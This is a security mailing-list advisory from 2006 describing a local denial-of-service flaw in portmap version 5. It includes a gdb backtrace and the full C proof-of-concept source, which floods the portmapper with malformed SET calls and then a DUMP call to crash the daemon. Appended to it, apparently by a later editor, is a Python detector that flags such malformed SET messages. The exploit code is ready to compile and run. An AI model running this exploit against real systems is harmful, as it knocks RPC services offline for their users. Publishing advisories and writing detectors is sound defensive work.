[EXPL] Portmap Local DoS (Set + Dump)

Subject: [EXPL] Portmap Local DoS (Set + Dump)
Date: 24 May 2006 13:57:11 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Portmap Local DoS (Set + Dump)
------------------------------------------------------------------------


SUMMARY

Portmap is a server that converts RPC program numbers into DARPA protocol 
port numbers.  It must be running in order to make RPC calls.

Portmap is vulnerable to a Denial of Service attack committed from 
localhost: a local user can crash the daemon with a series of malformed 
SET requests followed by a DUMP request.

DETAILS

Vulnerable Systems:
 * Portmap version 5.

Exploit:
/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////

// Tested on Linux with version 5

// USE DEBUGGING MODE
/////////////////////

// (gdb) backtrace
// #0  0xffffe410 in __kernel_vsyscall ()
// #1  0xb7f21343 in write () from /lib/tls/libc.so.6
// #2  0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3  0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4  0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5  0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6  0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7  0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8  0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9  0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303

// Builds against the classic Sun RPC headers shipped with older glibc
// (on newer systems the same headers come from libtirpc).
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>

int i;
int len = 600;            // number of SET calls / junk bytes, capped at 1024 below
char myhost[256];

int main(int argc, char *argv[]) {

  if (argc < 2) {
    printf("usage:%s <hostname> [len]\n", argv[0]);
    exit(1);
  }

  if (argc > 2) { len = atoi(argv[2]); }
  if (len > 1024) { len = 1024; }

  unsigned long PROGRAM = 100000;   // portmapper program number (PMAPPROG)
  unsigned long VERSION = 2;        // portmapper version 2 (PMAPVERS)

  struct hostent *hp;
  struct sockaddr_in server_addr;
  int sock = RPC_ANYSOCK;
  CLIENT *client;
  struct timeval timeout;
  timeout.tv_sec = 40;
  timeout.tv_usec = 0;

  if ((hp = gethostbyname(argv[1])) == NULL) {
    printf("Can't resolve %s\n", argv[1]);
    exit(0);
  }

  gethostname(myhost, sizeof(myhost) - 1);
  memset(&server_addr, 0, sizeof(server_addr));
  memcpy(&server_addr.sin_addr, hp->h_addr, hp->h_length);
  server_addr.sin_family = AF_INET;
  server_addr.sin_port = 0;         // 0: the RPC library asks the portmapper for the port

  if ((client = clnttcp_create(&server_addr, PROGRAM, VERSION, &sock, 1024, 1024)) == NULL) {
    clnt_pcreateerror("clnttcp_create");
    exit(0);
  }

  client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);

  // calloc() so both buffers start zeroed; one extra byte keeps "data" NUL-terminated
  // even at the 1024 cap (the original memset() strlen() of uninitialised memory).
  char *data = (char *) calloc(1025, 1);
  char *response = (char *) calloc(1025, 1);

  // PMAPPROC_SET (proc 1), sent with a growing XDR string where portmap expects
  // a pmap struct; each iteration appends one more '1' byte to the argument.
  for (i = 0; i < len; i++) {
    data[i] = '1';
    clnt_call(client, 1, (xdrproc_t) xdr_wrapstring, (char *) &data,
              (xdrproc_t) xdr_wrapstring, (char *) &response, timeout);
  }

  // PMAPPROC_DUMP (proc 4): the reply path shown in the backtrace above is where
  // portmap dies. xdr_wrapstring takes a char **, so the result is passed as &response.
  clnt_call(client, 4, (xdrproc_t) xdr_wrapstring, (char *) &data,
            (xdrproc_t) xdr_wrapstring, (char *) &response, timeout);

  clnt_destroy(client);
  close(sock);
  free(data);
  free(response);
  exit(0);
}
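As an added example (not part of the advisory or the PoC author's code), a small detector that parses ONC RPC v2 call messages and flags PMAPPROC_SET calls to the portmapper whose argument is not the 16-byte XDR pmap struct, which is exactly the shape of what the PoC above sends (an XDR string of repeated '1' bytes). The sample messages are constructed inline; names such as check_pmap_call and build_call are my own.

```python
import struct

PMAP_PROG, PMAP_VERS = 100000, 2          # portmapper program / version used by the PoC
PMAPPROC_SET, PMAPPROC_DUMP = 1, 4        # procedures the PoC calls
PMAP_STRUCT_LEN = 16                      # XDR pmap: four 32-bit fields (prog, vers, prot, port)
AUTH_NULL = struct.pack(">II", 0, 0)      # flavor AUTH_NULL with a zero-length body

def xdr_pad(n):
    """Size of an n-byte XDR opaque field once padded to 4-byte alignment."""
    return (n + 3) & ~3

def parse_rpc_call(msg):
    """Split an ONC RPC v2 CALL into (prog, vers, proc, argument bytes)."""
    if len(msg) < 24:
        raise ValueError("short RPC header")
    _xid, mtype, rpcvers, prog, vers, proc = struct.unpack(">6I", msg[:24])
    if mtype != 0 or rpcvers != 2:
        raise ValueError("not an RPC v2 CALL")
    off = 24
    for _ in range(2):                    # credential, then verifier (opaque_auth)
        if len(msg) < off + 8:
            raise ValueError("truncated auth")
        _flavor, blen = struct.unpack(">II", msg[off:off + 8])
        if blen > 400:                    # RFC 5531 caps opaque_auth bodies at 400 bytes
            raise ValueError("auth body too long")
        off += 8 + xdr_pad(blen)
    if off > len(msg):
        raise ValueError("truncated auth body")
    return prog, vers, proc, msg[off:]

def check_pmap_call(msg):
    """Verdict for one call: 'ok', 'not-portmap', or 'malformed-set(<n> bytes)'."""
    prog, vers, proc, args = parse_rpc_call(msg)
    if (prog, vers) != (PMAP_PROG, PMAP_VERS):
        return "not-portmap"
    if proc == PMAPPROC_SET and len(args) != PMAP_STRUCT_LEN:
        return "malformed-set(%d bytes)" % len(args)
    return "ok"

def build_call(prog, vers, proc, args, cred=AUTH_NULL):
    """Constructed RPC CALL (xid 1) used only to make the samples below."""
    return struct.pack(">6I", 1, 0, 2, prog, vers, proc) + cred + AUTH_NULL + args

# Constructed samples: a legitimate SET (NFS v2 over TCP, port 2049) and the PoC's
# payload, an XDR string of 600 '1' bytes (4-byte length prefix, no padding needed).
GOOD_SET = build_call(PMAP_PROG, PMAP_VERS, PMAPPROC_SET, struct.pack(">4I", 100003, 2, 6, 2049))
JUNK = b"1" * 600
BAD_SET = build_call(PMAP_PROG, PMAP_VERS, PMAPPROC_SET, struct.pack(">I", len(JUNK)) + JUNK)
```

The PoC itself uses AUTH_UNIX credentials, so the parser skips a credential body of any flavor rather than assuming AUTH_NULL.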


ADDITIONAL INFORMATION

The original article can be found at:
http://www.milw0rm.com/exploits/1815






